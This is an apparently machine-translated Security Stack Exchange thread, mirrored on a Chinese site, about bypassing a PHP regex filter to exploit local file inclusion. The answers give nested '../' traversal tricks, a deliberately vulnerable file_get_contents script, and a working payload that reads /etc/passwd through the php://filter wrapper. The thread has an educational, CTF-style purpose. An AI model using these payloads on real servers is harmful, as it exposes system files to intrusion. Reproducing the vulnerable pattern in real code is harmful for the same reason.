首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >LFI滤波器旁路

LFI滤波器旁路
EN

Security用户
提问于 2020-10-28 07:45:05
回答 2查看 7.4K关注 0票数 2
代码语言:javascript
复制
    $patterns[0] = '/[^[:print:]]+/'; // remove non-printable characters
    $patterns[1] = '/[ \t]+$/';  // remove whitespace at end of string
    $patterns[2] = '/^[ \t]+/';  // remove whitespace at beginning of string
    $patterns[4] = '/^[\\\\|\/]+/'; // remove leading slash if one exists
    $patterns[5] = '/^[\.\.\/|\.\.\\\\]+/'; // remove all ../ and all ..\ if any exist

我将感谢任何帮助解释如何绕过这个过滤器,以便我可以成功地使用LFI。

EN

回答 2

Security用户

回答已采纳

发布于 2020-10-28 08:03:22

想一想东西被移除后还会留下什么。F.ex:如果您从下面的. . /中移除空格。顺序很重要,而且没有足够的代码来确定移除模式的顺序,但是您可以使用删除../来离开../,除非它是递归替换的。只需将../注入到.. (如..././....// )中,您甚至可以使用dotdotpwn来尝试各种旁路。https://github.com/wireghoul/dotdotpwn

票数 4
EN

Security用户

发布于 2020-10-28 08:15:22

代码语言:javascript
复制
$pattern1 = '/[^[:print:]]+/'; // remove non-printable characters
$pattern2 = '/[ \t]+$/';  // remove whitespace at end of string
$pattern3 = '/^[ \t]+/';  // remove whitespace at beginning of string
$pattern4 = '/^[\\\\|\/]+/'; // remove leading slash if one exists
$pattern5 = '/^[\.\.\/|\.\.\\\\]+/'; // remove all ../ and all ..\ if any exist

echo "Welcome";
$data = $_GET['file'];
if (!preg_match($pattern1, $data)){
    if (!preg_match($pattern2, $data)){
        if (!preg_match($pattern3, $data)){
            if (!preg_match($pattern4, $data)){
                if (!preg_match($pattern5, $data)){
                    echo file_get_contents($data);
                }
            }
        }
    }
}

有效载荷:http://localhost:8080/php.php?file=php://filter/tmp/resource=/etc/passwd

解释:

  • 它有所有可打印的字符,因此绕过了第一个条件。
  • 它不是以空间开始或结束,所以我绕过了第二和第三条件。
  • 我使用了php://filter包装器,因此绕过了第四个条件。
  • 我用绝对路径绕过了第五个条件。

您可以在筛选器和资源之间放置任何内容:/filter/JUNK/resource

注意:如果我做错了什么,请纠正我。您可能需要使用file:///etc/passwd,因为此有效负载是php特定的。

下面是我面临的类似挑战:LFI CTF

票数 6
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/240118

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档